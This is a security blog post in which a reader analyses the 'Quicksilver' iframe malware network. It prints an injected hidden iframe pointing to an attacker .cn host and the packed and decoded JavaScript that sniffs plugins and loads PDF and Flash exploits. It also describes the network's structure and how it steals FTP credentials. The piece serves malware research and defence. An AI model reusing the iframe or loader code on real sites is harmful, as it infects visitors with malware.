msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Quicksilver Malware Network

   17 Sep 09   Filed in Website exploits

In my latest post about the iframe attack that used free domains from dynamic DNS hosting providers that pointed to a network of compromised dedicated server, I asked readers for any additional information they know about this attack. A few day later I received this email:

Hi there.

Since this may I am watching this network (I named it “quicksilver“) after two PCs/users ran into cn-8080-iframe-modified websites. Using only “white hat” instruments (dig, whois, malzilla, VMWare, google and my brain ;) ) I was able to collect information about the basic frame of this network.

It is not a simple botnet – it combines three networks with different functions to form a “malware superstructure”.

Nearly everything in this network is constantly moving (thus the name) and uses compromised machines acting as proxies or slaves. The machines of the real black hats are movable themselves – the older “gumblar” network (which i think is a precursor to quicksilver) used an ukrainian c&c-server with a different ip address.

At the end of the email, the reader said that he had a chart of this network and asked me if I wanted to take a look at it. The information looked interesting so I asked if he would like to publish it on my blog and got his permission:

you have my explicit permission to publish everything I send you – anonymously. Although I have a name and a title, the only thing relevant is to unmask those networks.

So here it is. I’ve published the story as is. I just added some formatting and converted the chart to GIF format to avoid PDF security concerns.

———————

Quicksilver

A customer called me back in June to complain about his computer acting funny. “Everything feels really slow and some tasks even will fail completely!” – I went to investigate and found one task eating up all the available cpu time. A task called “svchost.exe” with correct description, company name and image path. But it was running under the users account (which lacks admin priviliges).

After killing this process the machine recovers. I logged off and the user logged back on while I pressed an held the “shift”-key (thus suppressing “autostart”). Nothing suspicious happened and I ran Mark’s “Autoruns”. This revealed a program named “rncsys32.exe” sitting in the “Autostart” group – the complete file image, not a link!

Further investigation revealed at least three other malware programs failed to install themselves on the machine because of missing admin privileges. Unfortunately the user deleted his web browser history. He swore that he visited no shady sites and I closed this case.

Back home I started this program in a safe virtual machine – it masks itself by injection into a newly created “svchost” instance and eats up all cpu time – presumably by mistake. It looks for all kinds of configuration files of ftp programs in their default install paths. Gathering ftp accounts was one task of this malware program (McAfee: Generic.dx!hu trojan).

A few weeks later a family member called me. By visiting a certain website his Firefox always completely hung. Two days later Google warned him that this website may harm his computer. Fearing a malware infection he called me for help. Analyzing the suspicious website I found an inserted iframe like this one:

<iframe src="hxxp://shopfilmlifeonline .cn:8080/index.php" width=103 height=173 style="visibility:hidden"></iframe>

I called that URI in a virtual machine and got this:

<html>
<body>
<script>
e val(function(p,a,c,k,e,d){e=function(c){return
c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return
d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('g 5(){m{l(i=0;i<=8.7.j;i++){2=8.7[i].2;a((2.4("6
k")!=-1)||(2.4("6 r")!=-1)){9.b(\'<3 c="d/p.q"></3>\')}a(2.4("o")!=-1){9.b(\'<3
c="d/n.f"></3>\')}}}h(e){}}5();',28,28,'||name|iframe|indexOf|Fa 5zfha1|Adobe|plugins|navigator|document|if|write|src|cache||swf|function|catch||length|Acrobat|for|try|flash|Flash|readme|pdf|PDF'.split('|'),0,{}))
</script>
</body>
</html>

Now I needed a program for safely running this javascript. After some struggling with Google i finally found Malzilla – an excellent program for analyzing malicious websites. Malzilla runs this script thru its decoder and delivers another script:

function Fa5zfha1(){try{for(i=0;i<=navigator.plugins.length;i++){name=navigator.plugins[i].name;if((name.indexOf("Adobe
Acrobat")!=-1)||(name.indexOf("Adobe PDF")!=-1)){d ocument.write('<i frame
src="cache/readme.pdf"></iframe>')}if(name.indexOf("Flash")!=-1){d ocument.write('<iframe
src="cache/flash.swf"></iframe>')}}}catch(e){}}Fa5zfha1();

The malicious hidden iframe uses javascript to look for the installed plugins “Adobe Acrobat“, “Adobe PDF” and “Flash“. It loads either “readme.pdf” or “flash.swf” or both into the browser. After downloading both files an sending them to virustotal.com they are revealed as exploits for older versions of the corresponding plugins (McAfee: Exploit-PDF.b.gen.a and Exploit-CVE2007-0071).

Finally I used a virtual Windows machine with Firefox and an older Flash plugin behind a virtual transparent proxy to analyze the infection. Loading the exploits into a browser with admin privileges leads to multiple malware infections (koobface, cutwail, podmena …) along with one “master trojan”: rncsys32.exe.

My family member was lucky – the exploit was unable to infect his machine. The Adobe plugin on his machine was not old enough (the browser simply stopped working). My customer mentioned above must have crossed some website with the malicious iframe. I had to remove the older Adobe plugin.

After some further study with normal tools like dig, whois and Google this is my picture of the malware network that I named “Quicksilver“:

Quicksilver network (click to enlarge 1680x903)

Quicksilver network (click to enlarge 1680x903)

Quicksilver as it worked in July

  • 100+ domains like “bigbestlite .cn” for minimizing blacklist impact. Their nameservers are ns[1|2].freednshostway.com
  • a small set (4-6) of compromised (web)servers which act as DNS responders or DNS proxies for those domains
  • a large group of compromised web servers serving the malicious iframe
  • a group of compromised (web)servers (active: 5) which act as http-proxies on port 8080
  • a large group of infected windows botnet-drones sending account data (ftp) back to their master
  • a small group of compromised dedicated malware servers contacted by the “master trojan”
  • the c&c server and a kind of “master command list server”.

Over the following weeks I observed that nearly everything in this network changes (DNS servers/proxies, port 8080 web proxies, javascript code, master trojan, exploit versions, exploits, dedicated malware servers …). The only machines which seem to be static are the c&c server and the “master command list server”.

Because of the uploading of (ftp) accounts from the Windows drones the three main groups are constantly feeding each other and keep this network running for nearly half a year now.

Empty http responds and nginx gateway timeouts indicated that the network is not running as smoothly as it did back in June. Denis’ post “Dynamic DNS and Botnet of Zombie Web Servers” shows that the network (or a variant) is still out there and is probably looking for other ways to keep alive.

———————

I guess this story is interesting to both regular web surfers and to security researchers. I’d like to thank my anonymous contributor for such an insightful post and for all the efforts he put into this.

Invitation to contributors

If you have anything that is worth posting here please contact me and I’ll consider publishing it as a guest post.

Similar posts:

Reader's Comments (6)

  1. |

    Kaspersky already wrote about it

    Edit by Denis: The article is in Russian. It’s a really interesting research of the same iframe attack. Unfortunately I couldn’t find English version of the article.

  2. |

    Hey, google has a translation for the site just google the full URL and choose translate

  3. |

    Out of curiosity, do you know about how long Quicksilver has been active?